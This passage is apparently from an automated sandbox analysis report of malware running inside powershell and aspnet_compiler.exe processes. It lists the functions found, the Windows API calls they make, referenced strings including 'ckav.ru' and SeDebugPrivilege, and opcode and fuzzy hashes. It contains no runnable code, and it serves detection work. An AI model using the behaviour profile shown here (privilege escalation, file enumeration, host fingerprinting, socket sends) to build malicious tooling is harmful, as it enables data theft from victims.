Opcode Fuzzy Hash: d0a34a97da23b22c98b1ef2a4cbdd765f32edd64fd7ae5d95c469fbfee5c7a17
Instruction Fuzzy Hash: 9001807100E3C09ED7128B258894762BFB4DF53224F0DC0DBD9888F1A3C6695849C772

Function 00CFD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1950333513.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cfd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b2210d4c9bf31713172f4c92286d7b4b9d1cd3aa2222fbf937d8d0011e39c1
Instruction ID: 4baf62a7a1227c09f73c8a584f873ca1616e3608823ca1463cffa097c114113c
Opcode Fuzzy Hash: c6b2210d4c9bf31713172f4c92286d7b4b9d1cd3aa2222fbf937d8d0011e39c1
Instruction Fuzzy Hash: 41012B710093089AE7508B26CDC4777BF98DF41324F18C52AEE1A4B146CA79D981C6B2

Function 074B0000 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a47b4892e3641856adc48c2f849ab04a5942366752de4150691fc172d525b44
Instruction ID: e440933ddc84b8f5f02d52169dd1df39c17cf522940ea5d979bcb758b6b1a58b
Opcode Fuzzy Hash: 3a47b4892e3641856adc48c2f849ab04a5942366752de4150691fc172d525b44
Instruction Fuzzy Hash: 80012E6160E3C48FCB130B7488A10A03F719E6320074A84EBD6C1CF2EBE4689C8AC773

Non-executed Functions

Function 0463951E Relevance: 2.9, Strings: 2, Instructions: 410COMMON

Download Yara Rule

Strings

Xbq, xrefs: 0463956F
$^q, xrefs: 04639556

Memory Dump Source

Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4630000_powershell.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: 0df72a02dbd16c2b81d9f07568ed9304c744e8727e9c71dfc066fa82958987bb
Instruction ID: 218e8cf4a6c2159499f59fa614858be9642ff96ced5326cffec971709e939ae5
Opcode Fuzzy Hash: 0df72a02dbd16c2b81d9f07568ed9304c744e8727e9c71dfc066fa82958987bb
Instruction Fuzzy Hash: C3D10B71F042998FDB199B78985027EBBB2BFC5301F05486ED486D7285EF349C0A8B91

Function 074B1408 Relevance: 6.4, Strings: 5, Instructions: 116COMMON

Download Yara Rule

Strings

$^q, xrefs: 074B145B
$^q, xrefs: 074B1483
4'^q, xrefs: 074B149C
4'^q, xrefs: 074B14A8
$^q, xrefs: 074B1477

Memory Dump Source

Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: a9a083fedfbfe6f7fe55e05a90bc1973cc8f608313608935324ec3f387197e64
Instruction ID: 3f1e1076d2b9dad15e247797efc306fb970a8884c41f58337eaf9dc46fec7e13
Opcode Fuzzy Hash: a9a083fedfbfe6f7fe55e05a90bc1973cc8f608313608935324ec3f387197e64
Instruction Fuzzy Hash: B041E5B1B4420ECFC7349B6C84246E7BBE6AF85611F1484BBC506CB345EA31DC86C7A1

Function 074B0080 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

4'^q, xrefs: 074B00EB
4'^q, xrefs: 074B00F7
$^q, xrefs: 074B00D6
$^q, xrefs: 074B00CA

Memory Dump Source

Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 9602e0b0cce318bc2eca4db324332acd0c2a59fd595b7e2fb7ce86e9baf177f1
Instruction ID: 277f1334f6b017810ce17de1b2b7c5912a1f822abe4584a029b042bdb9fb9611
Opcode Fuzzy Hash: 9602e0b0cce318bc2eca4db324332acd0c2a59fd595b7e2fb7ce86e9baf177f1
Instruction Fuzzy Hash: 9001F221B093858FC73A122828345E72FB66FC391132944DBD080DF3A7CE258C8A83B2

Analysis Process: aspnet_compiler.exePID: 2736, Parent PID: 5820COMMON

Execution Graph

Execution Coverage:	31.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1847
Total number of Limit Nodes:	92

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Windows, xrefs: 00403DEA
Program Files, xrefs: 00403E01
%s\*, xrefs: 00403D99

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: b843d291922cb028a424347b2d452c12ea05f4332df516ff6c2fc32da94872c0
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: b843d291922cb028a424347b2d452c12ea05f4332df516ff6c2fc32da94872c0
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 654613820412ff34d189ecba838125917ffe11d91a09519782bfa90cb0a14a81
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 654613820412ff34d189ecba838125917ffe11d91a09519782bfa90cb0a14a81
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: e71fee0cb82f9de1c4e34fb615c0c1594af8034bef8567adcf2aba1f1a7220d0
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: e71fee0cb82f9de1c4e34fb615c0c1594af8034bef8567adcf2aba1f1a7220d0
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 96dd47190825543ab0d2155488efc9e466da80610ec56339a9b7da9a3c2350c6
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 96dd47190825543ab0d2155488efc9e466da80610ec56339a9b7da9a3c2350c6
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: db0b94f36f1e73eb4733ffbe385f419cfabdcc537d06727fd8a0d6aade8f6cee
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: db0b94f36f1e73eb4733ffbe385f419cfabdcc537d06727fd8a0d6aade8f6cee
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: 211886b386c3dd172c07a9bc8158a6ecc58d54a6c84e520ba7ef39c50b042283
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 211886b386c3dd172c07a9bc8158a6ecc58d54a6c84e520ba7ef39c50b042283
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: ff1e6c851b5f3ea5cf83d5590d52d177e00c05b60bca096cc9d56339f5657764
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: ff1e6c851b5f3ea5cf83d5590d52d177e00c05b60bca096cc9d56339f5657764
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 00402BAB Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 00403C59 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(00000000,00000000,004041B3,00000000,F25E823B,00000000,00000000,?,004041B3,00000000,00000000,00000000), ref: 00403C3C

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 5c28da5d626f681fb06662006ab0c2c95d6c94e8822ad681e7d12da421b0949b
Instruction ID: 708ff4401ac3282b12d7668d94bc51921ab55dbb6f1a62cfe087fe8b706b923f
Opcode Fuzzy Hash: 5c28da5d626f681fb06662006ab0c2c95d6c94e8822ad681e7d12da421b0949b
Instruction Fuzzy Hash: 57D0127200860CBFEF016EE59C05C7B3F5EEB04255B008825BD18E5021DA37DE2076E5

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
